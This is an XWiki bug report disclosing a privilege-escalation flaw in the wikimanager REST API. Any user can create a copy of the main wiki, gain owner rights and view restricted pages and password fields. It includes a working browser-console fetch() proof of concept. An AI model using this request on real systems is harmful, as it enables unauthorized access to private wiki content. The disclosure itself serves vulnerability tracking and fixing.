Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
5.4-rc-1
-
Integration
-
Unknown
-
N/A
-
Description
Steps to reproduce:
As any user (guest, regular user, ...) on a wiki where org.xwiki.platform:xwiki-platform-wiki-rest-default is installed execute the following code on any page in your browser's console:
fetch('/xwiki/rest/wikimanager?template=xwiki', { method: 'POST', headers: { "Content-Type": "text/xml"}, body: '<wiki xmlns="http://www.xwiki.org"><id>testwiki</id><name>testwiki</name><description>Some description of the test wiki</description></wiki>' }) .then(response => response.text().then(console.log)) .catch(console.log)
Expected result:
An error is logged that the user doesn't have the rights to create a wiki.
Actual result:
A new wiki is created that contains a copy of the main wiki. The current user is the owner of that wiki and has thus admin rights on the created wiki and is able to see all contents including pages the user previously couldn't access, password fields etc.
This attack can even be executed on a wiki where read access is denied on all pages but in this case the created wiki most likely cannot be accessed.
Note that the wikimanager REST API isn't installed by default so most XWiki installations aren't vulnerable to this attack.